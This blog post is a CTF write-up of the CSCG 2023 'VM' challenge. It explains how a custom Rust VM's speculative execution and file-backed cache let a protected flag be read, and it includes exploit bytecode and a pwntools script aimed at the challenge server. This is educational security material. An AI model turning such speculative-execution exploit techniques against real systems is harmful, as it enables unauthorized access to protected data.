---
layout: post
title: "CSCG 23 - Writeup: VM"
categories: ctf, cscg
author:
- Gehim
---
This year i participated in the [CSCG][CSCG] and managed to qualify for the finals again. All participants were required to submit three writeups to be eligible for the final round. I chose this challenge because i like the uniqueness and i wanted to appreciate the effort put into it.

# Overview
- Category: Misc
- Difficulty: Medium
- Author: lion
- Solves: 16

> Look at this totally not over-engineered virtual machine, almost like the real thing!

We will start by explaining the challenge structure. At the core of the challenge is a software-based VM written in Rust. Luckily, we are given both the source code of the VM implementation and the Dockerfile for the setup. This challenge features a remote server, upon connecting this Python script is executed.

```python
import os

def main():
    code = bytes.fromhex(input("Give me your code in hex:"))

    with open("/tmp/code", "wb") as fout:
        fout.write(code)

    os.execv("./vm", ["./vm", "/tmp/code"])

if __name__ == '__main__':
    main()
```
There is not much going on here. We can provide a hex-encoded input that is then written to a temporary file. Afterwards, the VM program is invoked and the temporary file is provided as the first argument. We can already suppose that we provide the instructions for the VM to execute and that we must somehow make the VM give us the flag.

The 32-bit VM is fully implemented in software. It features an instruction pointer, a stack pointer, two general-purpose register r0 and r1, and a zero flag. The variable-length instruction set features a variety of instructions, including stack operations, arithmetic and logical operations, conditional jumps, support for function calls, interrupts for IO operation (they will become very important later), and instructions to interact with the segmented memory. Some instructions allow for a prefix indicating the operand size.

The memory system is segmentation based without paging. Each segment, consisting of a size and a start address, is backed by a file and represented by a `Mapping`. Furthermore, the memory system utilizes caching to minimize the file accesses needed. Note how there are only 4 `CacheEntry` objects, each
storing 16 consecutive bytes.

```rust
struct CacheEntry {
    addr: u32,
    memory: [u8; CACHE_ENTRY_SIZE as usize],
    size: u32,
    is_dirty: bool,
}

struct Mapping {
    begin: u32,
    size: u32,
}

impl Mapping {
    fn path(&self) -> String {
        format!("map{:#08x}", self.begin)
    }
}

struct Memory {
    maps: Vec<Mapping>,
    cache: [Option<CacheEntry>; 4],
}
```
As this will become important for the challenge solution, we will now take a look at how the caching is implemented. This `fetch` method, respectively the `fetch_mut` method, is used to retrieve a reference to at most 16 bytes of memory. First, the cache is iterated over to check whether the requested memory is already present. If it is, the memory reference is returned and the corresponding `CacheEntry` is rotated to the front of the list, to hopefully fasten the next invocation. In case we obtain a mutable reference to the memory, the dirty flag is set.

So what happens when the requested memory is not in the cache? It is loaded from the file backing up the mapped section. If the cache is already full, that is there are 4 `CacheEntry` objects present, the last element is evicted and replaced by the new `CacheEntry`. To ensure consistency, if the dirty flag is set, the cached memory is written back to the disk. This happens when we request a mutable reference, i.e. we want to perform a write access.

```rust
let size = read_memory_from_disk(&path, addr - map.begin, &mut memory) as u32;

let last = self.cache.last_mut().unwrap();

let evicted = last.replace(CacheEntry {
    addr,
    memory,
    size,
    is_dirty: false,
});
```

```rust
    if is_dirty {
        let map = self.map_for_addr(addr).unwrap();
        let path = map.path();
        write_memory_to_disk(&path, addr - map.begin, &memory[0..size as usize]);
    }
```

Consequently, if we perform a write access and then do 4 memory accesses to different memory regions, i.e. they cannot be in the same `CacheEntry`, then the modified memory from the write access is written back to the file. Remember this.

Before the VM starts execution, there is some initialization.

```rust
let pc = 0x100000u32;
let sp = 0x200000u32;
let xx = 0x300000u32;
let mm = 0x400000u32;

let mut memory = Memory::new();
let mut verifier = Verifier::new();

mmap_unchecked_with_content(pc, &args.code_buf, Perm::RX, &mut memory, &mut verifier);
mmap_unchecked(sp, 0x1000, Perm::RW, &mut memory, &mut verifier);
mmap_unchecked(mm, 0x1000, Perm::RW, &mut memory, &mut verifier);

let flag = env::var("CSCG_VM_FLAG").unwrap_or("CSCG{redacted}".to_string());
mmap_unchecked_with_content(xx, flag.as_bytes(), Perm::None, &mut memory, &mut verifier);
```

Now the challenge objective is clear. The flag is mapped to non-readable memory and we must somehow find a way to read it. So far, we have yet to talk about the permission model used. Since there is no paging, each segment is assigned a permission. The permissions are stored in a B-tree.

```rust
enum Perm {
    RW,
    RX,
    None,
}
```

Note how within the complete cache and memory system the permissions are never actually checked. As long as the memory mapping exists, we can happily read and write whatever we want to. This is where the unique design of the VM comes into play. Usually, a VM is implemented as a single loop that is executing the instructions one by one, just like a real CPU (ignoring all the complicated mechanisms like out-of-order execution and instruction pipelining). However, this VM consists of two parallel running loops, the execution loop responsible for executing the next instruction, and the verification loop responsible for verifying the correctness of the executed instructions and for handling IO interrupts. Each loop has its own register object.

Communication between the two loops is done with atomic bools and a multi-consumer channel for passing the `Execution` objects from the execution loop to the verification loop. The `Execution` struct contains the execution result, as well as a set of partial registers, which are required for the instruction.

```rust
struct PartialRegisters {
    pc: u32,
    sp: Option<u32>,

    r0: Option<u32>,
    r1: Option<u32>,

    zero: Option<bool>,
}

struct ExecutionResult {
    regs: Registers,
    read_at: Option<u32>,
    write_at: Option<u32>,
    io_request: Option<IoRequest>,
}

struct Execution {
    assume: PartialRegisters,
    result: ExecutionResult,
}
```

Notice, the multi-consumer channel holds at most 8 messages.

```rust
let (send, recv) = crossbeam_channel::bounded::<Option<Execution>>(8);
```

## Execution loop

Each loop iteration starts with a check of the atomic run flag, if it is unset, the loop exits. Next, the instruction pointed at by the instruction pointer (pc) is decoded. Actually, there is a bit more going on here which we will omit since it is not relevant for the challenge solution. Afterwards, the instruction is executed and the registers and memory are updated accordingly. Interrupt instructions, that is IOwrite and IOread, are not executed, but merely ignored. Now the atomic reset flag is checked. If it is set by the validation loop, a reset is triggered. During a reset, the registers are reset to the state provided by the validation loop. Only if the current instruction includes a write access, the cache is invalidated. One may already ask what happens if only the second last instruction was a write access.

```rust
if check_reset_executor.load(Ordering::Relaxed) {
    let mut reset = reset_executor.lock().unwrap();
    if let Some(reset) = reset.take() {
        if reset.reset_caches || is_write {
            memory.invalidate_cache();
        }
        regs = reset.regs;

        check_reset_executor.store(false, Ordering::Relaxed);
        continue;
    }
}
```

Finally the result of the instruction execution is passed to the multi-consumer channel. This call is blocking in case the channel is full, so execution will stall until the validation loop takes out the next result from the channel.

## Validation loop

Perhaps, the validation loop is the more interesting aspect. It starts by receving an `execution` object from the channel, which then gets passed to the `verifier.verify_execution` function. This function first verifies that the assumed (partial) registers in the result match the registers of the validation loop. They may deviate in cases where an interrupt modified the registers, i.e. an IOread. If the registers do not match, a reset is indicated and later the reset flag is set atomically. Otherwise, the `exeuction` result is checked for correct read, write, and execution permissions. If a permission is violated, a fault is raised and the execution loop is terminated.

Furthermore interrupts are handled in `validator_handle_io`. If the instruction is either an IOwrite or an IOread interrupt, the register r0 is accordingly either printed or written into. Since during an IOread we read from stdin, the call to `validator_handle_io` can block. In that case the execution loop and the validation loop go out of sync, since the execution loop keeps executing instruction until the channel is full. Therefore we need to reset it, which happens on the next instruction the registers mismatch.

If the `verifier.verify_execution` function returned a reset, `validator_force_reset` is called. Besides setting the reset flag and and the correct registers in the \textsc{ExecutorReset} object, it also empties the communication channel.

```rust
while let Some(exec) = recv.try_recv().ok().flatten() {
    if exec.result.write_at.is_some() {
        reset_caches = true;
    }
}
```

Observe that the removed instruction results are not verified for correctness. This will enable our exploit.

# Solution

Now that we have a good understanding of how the VM is functioning we can start to exploit it. Our goal is clear. We want to read the flag stored in non-readable memory and print it back to us. The crucial observations are the following:

 - Memory is file backed
 - There are 4 \textsc{CacheEntry} objects and we can force a cache eviction with 4 instructions
 - The communication channel can hold up to 8 objects
 - IOread is a blocking interrupt and can trigger a reset
 - During a reset the remaining instructions are not verified
 - A reset only affects the registers and the cache, not the files

From this, we forge our exploit. First, we do an IOread, this will block the validation loop until we send data but will execute the next few instructions speculatively. Now we read the flag (or more precisely 4 flag bytes). This is obviously a faulty instruction, but since the validation loop is stuck, it does not get recognized for now. Now we do 4 more memory accesses and flush the flag to the disk. Then we enter something to the stdin and continue the validation loop which in turn will trigger a reset. Note that the flag is not affected by the reset since it has been written to the disk. In order to not raise a fault here we must redirect the execution to skip the invalid flag read, for example by jumping to r0 just after the IOread. Since IOread writes into r0, we can just write the target address to stdin. All that is left is to read the flag from the disk and output it with IOwrite. Therefore the payload looks like this.

```asm
mov r0, :A
IOread

; r0 will be different after the interrupt
jmp r0

:A
mov r1, [0x300000] ; read flag from read-protected memory

; make sure the flag gets written to disk
mov [0x400000], r1
mov [0x400100], r1
mov [0x400200], r1
mov [0x400300], r1
mov [0x400400], r1

; we will execute 8 instructions speculatively
NOP
NOP
NOP

:B
mov r1, [0x400000] ; load flag from memory

; IOwrite prints r0
mov r0, r1
IOwrite
```

```python
from pwn import *
import struct
import time

def pule(arg):
    """ Pack unsigned 32 bit little endian"""
    return struct.pack("<I", arg)

def uule(arg):
    """ Unpack unsigned 32 bit little endian"""
    return struct.unpack("<I", arg)[0]

flag_offset = 0
pc = 0x100000
flag = 0x300000 + flag_offset
heap = 0x400000

payload = b""

label_a = pc + 0x8

# mov r0, :A
payload += b"m" + pule(label_a)

# IOread
payload += b"#i"

# jmp r0
payload += b"j"

# :A
# load flag
payload += b"L" + pule(flag)

# store flag and flush cache
for i in range(5):
    payload += b"S" + pule(heap + 0x100 * i)

payload += b"..."

label_b = pc + len(payload)

# :B
# load stored flag
payload += b"L" + pule(heap)

# mov r0, r1
payload += b">"

# IOwrite
payload += b"#o"

# NOPs
payload += b"." * 10

p = remote("XXXXXXXXX-vm.challenge.master.cscg.live", 31337, ssl=True)

p.recvuntil(b"Give me your code in hex:")
p.sendline(payload.hex().encode())

time.sleep(0.1)
p.send(pule(label_b))

print(p.recv(4))
```

# Lessons learned

The challenge design obviously  does not reflect a real implementation and apart from our observations, there are other flaws. Nevertheless, we can at least try to provide solutions for the flaws we abused. First of all, it was also possible to start two connections and have the VMs share their files and memory, thus enabling a trivial attack. This could be fixed by using unique files. Secondly, a reset must ensure to reset the complete state, this includes the memory written to disk. This is a non-trivial task and we do not see a simple solution without major reworks. Thirdly, the validation loop should also verify the executions on a reset. Arguably, this will lead to problems if the validity depends on the input, so again, there is no quick and easy fix.

Overall this challenge shows that speculative execution and similar means are difficult to implement safely, as shown by real-world attacks such as Spectre.